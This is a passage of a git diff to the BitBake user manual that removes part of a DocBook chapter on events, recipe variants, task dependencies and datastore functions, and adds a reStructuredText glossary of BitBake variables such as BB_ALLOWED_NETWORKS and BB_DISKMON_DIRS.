-                    This event is usually only seen by the UIs as a
-                    sign they should also shutdown.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            This next list of example events occur based on specific
-            requests to the server.
-            These events are often used to communicate larger pieces of
-            information from the BitBake server to other parts of
-            BitBake such as user interfaces:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>bb.event.TreeDataPreparationStarted()</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.TreeDataPreparationProgress()</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.TreeDataPreparationCompleted()</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.DepTreeGenerated()</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.CoreBaseFilesFound()</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.ConfigFilePathFound()</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.FilesMatchingFound()</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.ConfigFilesFound()</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>bb.event.TargetsTreeGenerated()</filename>
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='variants-class-extension-mechanism'>
-        <title>Variants - Class Extension Mechanism</title>
-
-        <para>
-            BitBake supports two features that facilitate creating
-            from a single recipe file multiple incarnations of that
-            recipe file where all incarnations are buildable.
-            These features are enabled through the
-            <link linkend='var-bb-BBCLASSEXTEND'><filename>BBCLASSEXTEND</filename></link>
-            and
-            <link linkend='var-bb-BBVERSIONS'><filename>BBVERSIONS</filename></link>
-            variables.
-            <note>
-                The mechanism for this class extension is extremely
-                specific to the implementation.
-                Usually, the recipe's
-                <link linkend='var-bb-PROVIDES'><filename>PROVIDES</filename></link>,
-                <link linkend='var-bb-PN'><filename>PN</filename></link>, and
-                <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
-                variables would need to be modified by the extension class.
-                For specific examples, see the OE-Core
-                <filename>native</filename>, <filename>nativesdk</filename>,
-                and <filename>multilib</filename> classes.
-            </note>
-            <itemizedlist>
-                <listitem><para><emphasis><filename>BBCLASSEXTEND</filename>:</emphasis>
-                    This variable is a space separated list of classes used to "extend" the
-                    recipe for each variant.
-                    Here is an example that results in a second incarnation of the current
-                    recipe being available.
-                    This second incarnation will have the "native" class inherited.
-                    <literallayout class='monospaced'>
-     BBCLASSEXTEND = "native"
-                    </literallayout></para></listitem>
-                <listitem><para><emphasis><filename>BBVERSIONS</filename>:</emphasis>
-                    This variable allows a single recipe to build multiple versions of a
-                    project from a single recipe file.
-                    You can also specify conditional metadata
-                    (using the
-                    <link linkend='var-bb-OVERRIDES'><filename>OVERRIDES</filename></link>
-                    mechanism) for a single version, or an optionally named range of versions.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     BBVERSIONS = "1.0 2.0 git"
-     SRC_URI_git = "git://someurl/somepath.git"
-
-     BBVERSIONS = "1.0.[0-6]:1.0.0+ \ 1.0.[7-9]:1.0.7+"
-     SRC_URI_append_1.0.7+ = "file://some_patch_which_the_new_versions_need.patch;patch=1"
-                    </literallayout>
-                    The name of the range defaults to the original version of the
-                    recipe.
-                    For example, in OpenEmbedded, the recipe file
-                    <filename>foo_1.0.0+.bb</filename> creates a default name range
-                    of <filename>1.0.0+</filename>.
-                    This is useful because the range name is not only placed
-                    into overrides, but it is also made available for the metadata to use
-                    in the variable that defines the base recipe versions for use in
-                    <filename>file://</filename> search paths
-                    (<link linkend='var-bb-FILESPATH'><filename>FILESPATH</filename></link>).
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='dependencies'>
-        <title>Dependencies</title>
-
-        <para>
-            To allow for efficient parallel processing, BitBake handles
-            dependencies at the task level.
-            Dependencies can exist both between tasks within a single recipe
-            and between tasks in different recipes.
-            Following are examples of each:
-            <itemizedlist>
-                <listitem><para>For tasks within a single recipe, a
-                    recipe's <filename>do_configure</filename>
-                    task might need to complete before its
-                    <filename>do_compile</filename> task can run.
-                    </para></listitem>
-                <listitem><para>For tasks in different recipes, one
-                    recipe's <filename>do_configure</filename>
-                    task might require another recipe's
-                    <filename>do_populate_sysroot</filename>
-                    task to finish first such that the libraries and headers
-                    provided by the other recipe are available.
-                    </para></listitem>
-             </itemizedlist>
-         </para>
-
-         <para>
-             This section describes several ways to declare dependencies.
-             Remember, even though dependencies are declared in different ways, they
-             are all simply dependencies between tasks.
-         </para>
-
-        <section id='dependencies-internal-to-the-bb-file'>
-            <title>Dependencies Internal to the <filename>.bb</filename> File</title>
-
-            <para>
-                BitBake uses the <filename>addtask</filename> directive
-                to manage dependencies that are internal to a given recipe
-                file.
-                You can use the <filename>addtask</filename> directive to
-                indicate when a task is dependent on other tasks or when
-                other tasks depend on that recipe.
-                Here is an example:
-                <literallayout class='monospaced'>
-     addtask printdate after do_fetch before do_build
-                </literallayout>
-                In this example, the <filename>do_printdate</filename>
-                task depends on the completion of the
-                <filename>do_fetch</filename> task, and the
-                <filename>do_build</filename> task depends on the
-                completion of the <filename>do_printdate</filename>
-                task.
-                <note><para>
-                    For a task to run, it must be a direct or indirect
-                    dependency of some other task that is scheduled to
-                    run.</para>
-
-                    <para>For illustration, here are some examples:
-                    <itemizedlist>
-                        <listitem><para>
-                            The directive
-                            <filename>addtask mytask before do_configure</filename>
-                            causes <filename>do_mytask</filename> to run before
-                            <filename>do_configure</filename> runs.
-                            Be aware that <filename>do_mytask</filename> still only
-                            runs if its <link linkend='checksums'>input checksum</link>
-                            has changed since the last time it was run.
-                            Changes to the input checksum of
-                            <filename>do_mytask</filename> also indirectly cause
-                            <filename>do_configure</filename> to run.
-                            </para></listitem>
-                        <listitem><para>
-                            The directive
-                            <filename>addtask mytask after do_configure</filename>
-                            by itself never causes <filename>do_mytask</filename>
-                            to run.
-                            <filename>do_mytask</filename> can still be run manually
-                            as follows:
-                            <literallayout class='monospaced'>
-     $ bitbake <replaceable>recipe</replaceable> -c mytask
-                            </literallayout>
-                            Declaring <filename>do_mytask</filename> as a dependency
-                            of some other task that is scheduled to run also causes
-                            it to run.
-                            Regardless, the task runs after
-                            <filename>do_configure</filename>.
-                            </para></listitem>
-                    </itemizedlist></para>
-                </note>
-            </para>
-        </section>
-
-        <section id='build-dependencies'>
-            <title>Build Dependencies</title>
-
-            <para>
-                BitBake uses the
-                <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
-                variable to manage build time dependencies.
-                The <filename>[deptask]</filename> varflag for tasks
-                signifies the task of each
-                item listed in <filename>DEPENDS</filename> that must
-                complete before that task can be executed.
-                Here is an example:
-                <literallayout class='monospaced'>
-     do_configure[deptask] = "do_populate_sysroot"
-                </literallayout>
-                In this example, the <filename>do_populate_sysroot</filename>
-                task of each item in <filename>DEPENDS</filename> must complete before
-                <filename>do_configure</filename> can execute.
-            </para>
-        </section>
-
-        <section id='runtime-dependencies'>
-            <title>Runtime Dependencies</title>
-
-            <para>
-                BitBake uses the
-                <link linkend='var-bb-PACKAGES'><filename>PACKAGES</filename></link>,
-                <link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link>, and
-                <link linkend='var-bb-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
-                variables to manage runtime dependencies.
-            </para>
-
-            <para>
-                The <filename>PACKAGES</filename> variable lists runtime
-                packages.
-                Each of those packages can have <filename>RDEPENDS</filename> and
-                <filename>RRECOMMENDS</filename> runtime dependencies.
-                The <filename>[rdeptask]</filename> flag for tasks is used to
-                signify the task of each
-                item runtime dependency which must have completed before that
-                task can be executed.
-                <literallayout class='monospaced'>
-     do_package_qa[rdeptask] = "do_packagedata"
-                </literallayout>
-                In the previous example, the <filename>do_packagedata</filename>
-                task of each item in <filename>RDEPENDS</filename> must have
-                completed before <filename>do_package_qa</filename> can execute.
-                Although <filename>RDEPENDS</filename> contains entries from the
-                runtime dependency namespace, BitBake knows how to map them back
-                to the build-time dependency namespace, in which the tasks are defined.
-            </para>
-        </section>
-
-        <section id='recursive-dependencies'>
-            <title>Recursive Dependencies</title>
-
-            <para>
-                BitBake uses the <filename>[recrdeptask]</filename> flag to manage
-                recursive task dependencies.
-                BitBake looks through the build-time and runtime
-                dependencies of the current recipe, looks through
-                the task's inter-task
-                dependencies, and then adds dependencies for the
-                listed task.
-                Once BitBake has accomplished this, it recursively works through
-                the dependencies of those tasks.
-                Iterative passes continue until all dependencies are discovered
-                and added.
-            </para>
-
-            <para>
-                The <filename>[recrdeptask]</filename> flag is most commonly
-                used in high-level
-                recipes that need to wait for some task to finish "globally".
-                For example, <filename>image.bbclass</filename> has the following:
-                <literallayout class='monospaced'>
-     do_rootfs[recrdeptask] += "do_packagedata"
-                </literallayout>
-                This statement says that the <filename>do_packagedata</filename>
-                task of the current recipe and all recipes reachable
-                (by way of dependencies) from the
-                image recipe must run before the <filename>do_rootfs</filename>
-                task can run.
-            </para>
-
-            <para>
-                BitBake allows a task to recursively depend on itself by
-                referencing itself in the task list:
-                <literallayout class='monospaced'>
-     do_a[recrdeptask] = "do_a do_b"
-                </literallayout>
-                In the same way as before, this means that the <filename>do_a</filename>
-                and <filename>do_b</filename> tasks of the current recipe and all
-                recipes reachable (by way of dependencies) from the recipe
-                must run before the <filename>do_a</filename> task can run. In this
-                case BitBake will ignore the current recipe's <filename>do_a</filename>
-                task circular dependency on itself.
-            </para>
-        </section>
-
-        <section id='inter-task-dependencies'>
-            <title>Inter-Task Dependencies</title>
-
-            <para>
-                BitBake uses the <filename>[depends]</filename>
-                flag in a more generic form
-                to manage inter-task dependencies.
-                This more generic form allows for inter-dependency
-                checks for specific tasks rather than checks for
-                the data in <filename>DEPENDS</filename>.
-                Here is an example:
-                <literallayout class='monospaced'>
-     do_patch[depends] = "quilt-native:do_populate_sysroot"
-                </literallayout>
-                In this example, the <filename>do_populate_sysroot</filename>
-                task of the target <filename>quilt-native</filename>
-                must have completed before the
-                <filename>do_patch</filename> task can execute.
-            </para>
-
-            <para>
-                The <filename>[rdepends]</filename> flag works in a similar
-                way but takes targets
-                in the runtime namespace instead of the build-time dependency
-                namespace.
-            </para>
-        </section>
-    </section>
-
-    <section id='functions-you-can-call-from-within-python'>
-        <title>Functions You Can Call From Within Python</title>
-
-        <para>
-            BitBake provides many functions you can call from
-            within Python functions.
-            This section lists the most commonly used functions,
-            and mentions where to find others.
-        </para>
-
-        <section id='functions-for-accessing-datastore-variables'>
-            <title>Functions for Accessing Datastore Variables</title>
-
-            <para>
-                It is often necessary to access variables in the
-                BitBake datastore using Python functions.
-                The BitBake datastore has an API that allows you this
-                access.
-                Here is a list of available operations:
-            </para>
-
-            <para>
-                <informaltable frame='none'>
-                    <tgroup cols='2' align='left' colsep='1' rowsep='1'>
-                        <colspec colname='c1' colwidth='1*'/>
-                        <colspec colname='c2' colwidth='1*'/>
-                        <thead>
-                            <row>
-                                <entry align="left"><emphasis>Operation</emphasis></entry>
-                                <entry align="left"><emphasis>Description</emphasis></entry>
-                            </row>
-                        </thead>
-                        <tbody>
-                            <row>
-                                <entry align="left"><filename>d.getVar("X", expand)</filename></entry>
-                                <entry align="left">Returns the value of variable "X".
-                                    Using "expand=True" expands the value.
-                                    Returns "None" if the variable "X" does not exist.</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.setVar("X", "value")</filename></entry>
-                                <entry align="left">Sets the variable "X" to "value".</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.appendVar("X", "value")</filename></entry>
-                                <entry align="left">Adds "value" to the end of the variable "X".
-                                    Acts like <filename>d.setVar("X", "value")</filename>
-                                    if the variable "X" does not exist.</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.prependVar("X", "value")</filename></entry>
-                                <entry align="left">Adds "value" to the start of the variable "X".
-                                    Acts like <filename>d.setVar("X", "value")</filename>
-                                    if the variable "X" does not exist.</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.delVar("X")</filename></entry>
-                                <entry align="left">Deletes the variable "X" from the datastore.
-                                    Does nothing if the variable "X" does not exist.</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.renameVar("X", "Y")</filename></entry>
-                                <entry align="left">Renames the variable "X" to "Y".
-                                    Does nothing if the variable "X" does not exist.</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.getVarFlag("X", flag, expand)</filename></entry>
-                                <entry align="left">Returns the value of variable "X".
-                                    Using "expand=True" expands the value.
-                                    Returns "None" if either the variable "X" or the named flag
-                                    does not exist.</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.setVarFlag("X", flag, "value")</filename></entry>
-                                <entry align="left">Sets the named flag for variable "X" to "value".</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.appendVarFlag("X", flag, "value")</filename></entry>
-                                <entry align="left">Appends "value" to the named flag on the
-                                    variable "X".
-                                    Acts like <filename>d.setVarFlag("X", flag, "value")</filename>
-                                    if the named flag does not exist.</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.prependVarFlag("X", flag, "value")</filename></entry>
-                                <entry align="left">Prepends "value" to the named flag on
-                                    the variable "X".
-                                    Acts like <filename>d.setVarFlag("X", flag, "value")</filename>
-                                    if the named flag does not exist.</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.delVarFlag("X", flag)</filename></entry>
-                                <entry align="left">Deletes the named flag on the variable
-                                    "X" from the datastore.</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.setVarFlags("X", flagsdict)</filename></entry>
-                                <entry align="left">Sets the flags specified in
-                                    the <filename>flagsdict()</filename> parameter.
-                                    <filename>setVarFlags</filename> does not clear previous flags.
-                                    Think of this operation as <filename>addVarFlags</filename>.</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.getVarFlags("X")</filename></entry>
-                                <entry align="left">Returns a <filename>flagsdict</filename>
-                                    of the flags for the variable "X".
-                                    Returns "None" if the variable "X" does not exist.</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.delVarFlags("X")</filename></entry>
-                                <entry align="left">Deletes all the flags for the variable "X".
-                                    Does nothing if the variable "X" does not exist.</entry>
-                            </row>
-                            <row>
-                                <entry align="left"><filename>d.expand(expression)</filename></entry>
-                                <entry align="left">Expands variable references in the specified
-                                    string expression.
-                                    References to variables that do not exist are left as is.
-                                    For example, <filename>d.expand("foo ${X}")</filename>
-                                    expands to the literal string "foo ${X}" if the
-                                    variable "X" does not exist.</entry>
-                            </row>
-                        </tbody>
-                    </tgroup>
-                </informaltable>
-            </para>
-        </section>
-
-        <section id='other-functions'>
-            <title>Other Functions</title>
-
-            <para>
-                You can find many other functions that can be called
-                from Python by looking at the source code of the
-                <filename>bb</filename> module, which is in
-                <filename>bitbake/lib/bb</filename>.
-                For example,
-                <filename>bitbake/lib/bb/utils.py</filename> includes
-                the commonly used functions
-                <filename>bb.utils.contains()</filename> and
-                <filename>bb.utils.mkdirhier()</filename>, which come
-                with docstrings.
-            </para>
-        </section>
-    </section>
-
-    <section id='task-checksums-and-setscene'>
-        <title>Task Checksums and Setscene</title>
-
-        <para>
-            BitBake uses checksums (or signatures) along with the setscene
-            to determine if a task needs to be run.
-            This section describes the process.
-            To help understand how BitBake does this, the section assumes an
-            OpenEmbedded metadata-based example.
-        </para>
-
-        <para>
-            These checksums are stored in
-            <link linkend='var-bb-STAMP'><filename>STAMP</filename></link>.
-            You can examine the checksums using the following BitBake command:
-            <literallayout class='monospaced'>
-     $ bitbake-dumpsigs
-            </literallayout>
-            This command returns the signature data in a readable format
-            that allows you to examine the inputs used when the
-            OpenEmbedded build system generates signatures.
-            For example, using <filename>bitbake-dumpsigs</filename>
-            allows you to examine the <filename>do_compile</filename>
-            task's “sigdata� for a C application (e.g.
-            <filename>bash</filename>).
-            Running the command also reveals that the “CC� variable is part of
-            the inputs that are hashed.
-            Any changes to this variable would invalidate the stamp and
-            cause the <filename>do_compile</filename> task to run.
-        </para>
-
-        <para>
-            The following list describes related variables:
-            <itemizedlist>
-                <listitem><para>
-                    <link linkend='var-bb-BB_HASHCHECK_FUNCTION'><filename>BB_HASHCHECK_FUNCTION</filename></link>:
-                    Specifies the name of the function to call during
-                    the "setscene" part of the task's execution in order
-                    to validate the list of task hashes.
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-bb-BB_SETSCENE_DEPVALID'><filename>BB_SETSCENE_DEPVALID</filename></link>:
-                    Specifies a function BitBake calls that determines
-                    whether BitBake requires a setscene dependency to
-                    be met.
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-bb-BB_SETSCENE_VERIFY_FUNCTION2'><filename>BB_SETSCENE_VERIFY_FUNCTION2</filename></link>:
-                    Specifies a function to call that verifies the list of
-                    planned task execution before the main task execution
-                    happens.
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-bb-BB_STAMP_POLICY'><filename>BB_STAMP_POLICY</filename></link>:
-                    Defines the mode for comparing timestamps of stamp files.
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-bb-BB_STAMP_WHITELIST'><filename>BB_STAMP_WHITELIST</filename></link>:
-                    Lists stamp files that are looked at when the stamp policy
-                    is "whitelist".
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-bb-BB_TASKHASH'><filename>BB_TASKHASH</filename></link>:
-                    Within an executing task, this variable holds the hash
-                    of the task as returned by the currently enabled
-                    signature generator.
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-bb-STAMP'><filename>STAMP</filename></link>:
-                    The base path to create stamp files.
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-bb-STAMPCLEAN'><filename>STAMPCLEAN</filename></link>:
-                    Again, the base path to create stamp files but can use wildcards
-                    for matching a range of files for clean operations.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='wildcard-support-in-variables'>
-        <title>Wildcard Support in Variables</title>
-
-        <para>
-            Support for wildcard use in variables varies depending on the
-            context in which it is used.
-            For example, some variables and file names allow limited use of
-            wildcards through the "<filename>%</filename>" and
-            "<filename>*</filename>" characters.
-            Other variables or names support Python's
-            <ulink url='https://docs.python.org/3/library/glob.html'><filename>glob</filename></ulink>
-            syntax,
-            <ulink url='https://docs.python.org/3/library/fnmatch.html#module-fnmatch'><filename>fnmatch</filename></ulink>
-            syntax, or
-            <ulink url='https://docs.python.org/3/library/re.html#re'><filename>Regular Expression (re)</filename></ulink>
-            syntax.
-        </para>
-
-        <para>
-            For variables that have wildcard suport, the
-            documentation describes which form of wildcard, its
-            use, and its limitations.
-        </para>
-    </section>
-
-</chapter>
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.rst
new file mode 100644
index 0000000000..74a3eb8095
--- /dev/null
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.rst
@@ -0,0 +1,1372 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+==================
+Variables Glossary
+==================
+
+|
+
+This chapter lists common variables used by BitBake and gives an
+overview of their function and contents.
+
+.. note::
+
+   Following are some points regarding the variables listed in this
+   glossary:
+
+   -  The variables listed in this glossary are specific to BitBake.
+      Consequently, the descriptions are limited to that context.
+
+   -  Also, variables exist in other systems that use BitBake (e.g. The
+      Yocto Project and OpenEmbedded) that have names identical to those
+      found in this glossary. For such cases, the variables in those
+      systems extend the functionality of the variable as it is
+      described here in this glossary.
+
+   -  Finally, there are variables mentioned in this glossary that do
+      not appear in the BitBake glossary. These other variables are
+      variables used in systems that use BitBake.
+
+.. glossary::
+
+   :term:`ASSUME_PROVIDED`
+      Lists recipe names (:term:`PN` values) BitBake does not
+      attempt to build. Instead, BitBake assumes these recipes have already
+      been built.
+
+      In OpenEmbedded-Core, ``ASSUME_PROVIDED`` mostly specifies native
+      tools that should not be built. An example is ``git-native``, which
+      when specified allows for the Git binary from the host to be used
+      rather than building ``git-native``.
+
+   :term:`B`
+      The directory in which BitBake executes functions during a recipe's
+      build process.
+
+   :term:`BB_ALLOWED_NETWORKS`
+      Specifies a space-delimited list of hosts that the fetcher is allowed
+      to use to obtain the required source code. Following are
+      considerations surrounding this variable:
+
+      -  This host list is only used if
+         :term:`BB_NO_NETWORK` is either not set or
+         set to "0".
+
+      -  Limited support for the "``*``" wildcard character for matching
+         against the beginning of host names exists. For example, the
+         following setting matches ``git.gnu.org``, ``ftp.gnu.org``, and
+         ``foo.git.gnu.org``. ::
+
+            BB_ALLOWED_NETWORKS = "\*.gnu.org"
+
+         .. important::
+
+            The use of the "``*``" character only works at the beginning of
+            a host name and it must be isolated from the remainder of the
+            host name. You cannot use the wildcard character in any other
+            location of the name or combined with the front part of the
+            name.
+
+            For example, ``*.foo.bar`` is supported, while ``*aa.foo.bar``
+            is not.
+
+      -  Mirrors not in the host list are skipped and logged in debug.
+
+      -  Attempts to access networks not in the host list cause a failure.
+
+      Using ``BB_ALLOWED_NETWORKS`` in conjunction with
+      :term:`PREMIRRORS` is very useful. Adding the
+      host you want to use to ``PREMIRRORS`` results in the source code
+      being fetched from an allowed location and avoids raising an error
+      when a host that is not allowed is in a
+      :term:`SRC_URI` statement. This is because the
+      fetcher does not attempt to use the host listed in ``SRC_URI`` after
+      a successful fetch from the ``PREMIRRORS`` occurs.
+
+   :term:`BB_CONSOLELOG`
+      Specifies the path to a log file into which BitBake's user interface
+      writes output during the build.
+
+   :term:`BB_CURRENTTASK`
+      Contains the name of the currently running task. The name does not
+      include the ``do_`` prefix.
+
+   :term:`BB_DANGLINGAPPENDS_WARNONLY`
+      Defines how BitBake handles situations where an append file
+      (``.bbappend``) has no corresponding recipe file (``.bb``). This
+      condition often occurs when layers get out of sync (e.g. ``oe-core``
+      bumps a recipe version and the old recipe no longer exists and the
+      other layer has not been updated to the new version of the recipe
+      yet).
+
+      The default fatal behavior is safest because it is the sane reaction
+      given something is out of sync. It is important to realize when your
+      changes are no longer being applied.
+
+   :term:`BB_DEFAULT_TASK`
+      The default task to use when none is specified (e.g. with the ``-c``
+      command line option). The task name specified should not include the
+      ``do_`` prefix.
+
+   :term:`BB_DISKMON_DIRS`
+      Monitors disk space and available inodes during the build and allows
+      you to control the build based on these parameters.
+
+      Disk space monitoring is disabled by default. When setting this
+      variable, use the following form: ::
+
+         BB_DISKMON_DIRS = "<action>,<dir>,<threshold> [...]"
+
+         where:
+
+            <action> is:
+               ABORT:     Immediately abort the build when
+                          a threshold is broken.
+               STOPTASKS: Stop the build after the currently
+                          executing tasks have finished when
+                          a threshold is broken.
+               WARN:      Issue a warning but continue the
+                          build when a threshold is broken.
+                          Subsequent warnings are issued as
+                          defined by the
+                          BB_DISKMON_WARNINTERVAL variable,
+                          which must be defined.
+
+            <dir> is:
+               Any directory you choose. You can specify one or
+               more directories to monitor by separating the
+               groupings with a space.  If two directories are
+               on the same device, only the first directory
+               is monitored.
+
+            <threshold> is:
+               Either the minimum available disk space,
+               the minimum number of free inodes, or
+               both.  You must specify at least one.  To
+               omit one or the other, simply omit the value.
+               Specify the threshold using G, M, K for Gbytes,
+               Mbytes, and Kbytes, respectively. If you do
+               not specify G, M, or K, Kbytes is assumed by
+               default.  Do not use GB, MB, or KB.
+
+      Here are some examples: ::
+
+         BB_DISKMON_DIRS = "ABORT,${TMPDIR},1G,100K WARN,${SSTATE_DIR},1G,100K"
+         BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},1G"
+         BB_DISKMON_DIRS = "ABORT,${TMPDIR},,100K"
+
+      The first example works only if you also set the
+      :term:`BB_DISKMON_WARNINTERVAL`
+      variable. This example causes the build system to immediately abort
+      when either the disk space in ``${TMPDIR}`` drops below 1 Gbyte or
+      the available free inodes drops below 100 Kbytes. Because two
+      directories are provided with the variable, the build system also
+      issues a warning when the disk space in the ``${SSTATE_DIR}``
+      directory drops below 1 Gbyte or the number of free inodes drops
+      below 100 Kbytes. Subsequent warnings are issued during intervals as
+      defined by the ``BB_DISKMON_WARNINTERVAL`` variable.
+
+      The second example stops the build after all currently executing
+      tasks complete when the minimum disk space in the ``${TMPDIR}``
+      directory drops below 1 Gbyte. No disk monitoring occurs for the free
+      inodes in this case.
+
+      The final example immediately aborts the build when the number of
+      free inodes in the ``${TMPDIR}`` directory drops below 100 Kbytes. No
+      disk space monitoring for the directory itself occurs in this case.
+
+   :term:`BB_DISKMON_WARNINTERVAL`
+      Defines the disk space and free inode warning intervals.
+
+      If you are going to use the ``BB_DISKMON_WARNINTERVAL`` variable, you
+      must also use the :term:`BB_DISKMON_DIRS`
+      variable and define its action as "WARN". During the build,
+      subsequent warnings are issued each time disk space or number of free
+      inodes further reduces by the respective interval.
+
+      If you do not provide a ``BB_DISKMON_WARNINTERVAL`` variable and you
+      do use ``BB_DISKMON_DIRS`` with the "WARN" action, the disk
+      monitoring interval defaults to the following:
+      BB_DISKMON_WARNINTERVAL = "50M,5K"
+
+      When specifying the variable in your configuration file, use the
+      following form: ::
+
+         BB_DISKMON_WARNINTERVAL = "<disk_space_interval>,<disk_inode_interval>"
+
+         where:
+
+            <disk_space_interval> is:
+               An interval of memory expressed in either
+               G, M, or K for Gbytes, Mbytes, or Kbytes,
+               respectively. You cannot use GB, MB, or KB.
+
+            <disk_inode_interval> is:
+               An interval of free inodes expressed in either
+               G, M, or K for Gbytes, Mbytes, or Kbytes,
+               respectively. You cannot use GB, MB, or KB.
+
+      Here is an example: ::
+
+         BB_DISKMON_DIRS = "WARN,${SSTATE_DIR},1G,100K"
+         BB_DISKMON_WARNINTERVAL = "50M,5K"
+
+      These variables cause BitBake to
+      issue subsequent warnings each time the available disk space further
+      reduces by 50 Mbytes or the number of free inodes further reduces by
+      5 Kbytes in the ``${SSTATE_DIR}`` directory. Subsequent warnings
+      based on the interval occur each time a respective interval is
+      reached beyond the initial warning (i.e. 1 Gbytes and 100 Kbytes).
+
+   :term:`BB_ENV_WHITELIST`
+      Specifies the internal whitelist of variables to allow through from
+      the external environment into BitBake's datastore. If the value of
+      this variable is not specified (which is the default), the following
+      list is used: :term:`BBPATH`, :term:`BB_PRESERVE_ENV`,
+      :term:`BB_ENV_WHITELIST`, and :term:`BB_ENV_EXTRAWHITE`.
+
+      .. note::
+
+         You must set this variable in the external environment in order
+         for it to work.
+
+   :term:`BB_ENV_EXTRAWHITE`
+      Specifies an additional set of variables to allow through (whitelist)
+      from the external environment into BitBake's datastore. This list of
+      variables are on top of the internal list set in
+      :term:`BB_ENV_WHITELIST`.
+
+      .. note::
+
+         You must set this variable in the external environment in order
+         for it to work.
+
+   :term:`BB_FETCH_PREMIRRORONLY`
+      When set to "1", causes BitBake's fetcher module to only search
+      :term:`PREMIRRORS` for files. BitBake will not
+      search the main :term:`SRC_URI` or
+      :term:`MIRRORS`.
+
+   :term:`BB_FILENAME`
+      Contains the filename of the recipe that owns the currently running
+      task. For example, if the ``do_fetch`` task that resides in the
+      ``my-recipe.bb`` is executing, the ``BB_FILENAME`` variable contains
+      "/foo/path/my-recipe.bb".
+
+   :term:`BBFILES_DYNAMIC`
+      Activates content depending on presence of identified layers.  You
+      identify the layers by the collections that the layers define.
+
+      Use the ``BBFILES_DYNAMIC`` variable to avoid ``.bbappend`` files whose
+      corresponding ``.bb`` file is in a layer that attempts to modify other
+      layers through ``.bbappend`` but does not want to introduce a hard
+      dependency on those other layers.
+
+      Additionally you can prefix the rule with "!" to add ``.bbappend`` and
+      ``.bb`` files in case a layer is not present.  Use this avoid hard
+      dependency on those other layers.
+
+      Use the following form for ``BBFILES_DYNAMIC``: ::
+
+         collection_name:filename_pattern
+
+      The following example identifies two collection names and two filename
+      patterns: ::
+
+         BBFILES_DYNAMIC += "\
+             clang-layer:${LAYERDIR}/bbappends/meta-clang/*/*/*.bbappend \
+             core:${LAYERDIR}/bbappends/openembedded-core/meta/*/*/*.bbappend \
+         "
+
+      When the collection name is prefixed with "!" it will add the file pattern in case
+      the layer is absent: ::
+
+         BBFILES_DYNAMIC += "\
+             !clang-layer:${LAYERDIR}/backfill/meta-clang/*/*/*.bb \
+         "
+
+      This next example shows an error message that occurs because invalid
+      entries are found, which cause parsing to abort: ::
+
+         ERROR: BBFILES_DYNAMIC entries must be of the form {!}<collection name>:<filename pattern>, not:
+         /work/my-layer/bbappends/meta-security-isafw/*/*/*.bbappend
+         /work/my-layer/bbappends/openembedded-core/meta/*/*/*.bbappend
+
+   :term:`BB_GENERATE_MIRROR_TARBALLS`
+      Causes tarballs of the Git repositories, including the Git metadata,
+      to be placed in the :term:`DL_DIR` directory. Anyone
+      wishing to create a source mirror would want to enable this variable.
+
+      For performance reasons, creating and placing tarballs of the Git
+      repositories is not the default action by BitBake. ::
+
+         BB_GENERATE_MIRROR_TARBALLS = "1"
+
+   :term:`BB_HASHCONFIG_WHITELIST`
+      Lists variables that are excluded from base configuration checksum,
+      which is used to determine if the cache can be reused.
+
+      One of the ways BitBake determines whether to re-parse the main
+      metadata is through checksums of the variables in the datastore of
+      the base configuration data. There are variables that you typically
+      want to exclude when checking whether or not to re-parse and thus
+      rebuild the cache. As an example, you would usually exclude ``TIME``
+      and ``DATE`` because these variables are always changing. If you did
+      not exclude them, BitBake would never reuse the cache.
+
+   :term:`BB_HASHBASE_WHITELIST`
+      Lists variables that are excluded from checksum and dependency data.
+      Variables that are excluded can therefore change without affecting
+      the checksum mechanism. A common example would be the variable for
+      the path of the build. BitBake's output should not (and usually does
+      not) depend on the directory in which it was built.
+
+   :term:`BB_HASHCHECK_FUNCTION`
+      Specifies the name of the function to call during the "setscene" part
+      of the task's execution in order to validate the list of task hashes.
+      The function returns the list of setscene tasks that should be
+      executed.
+
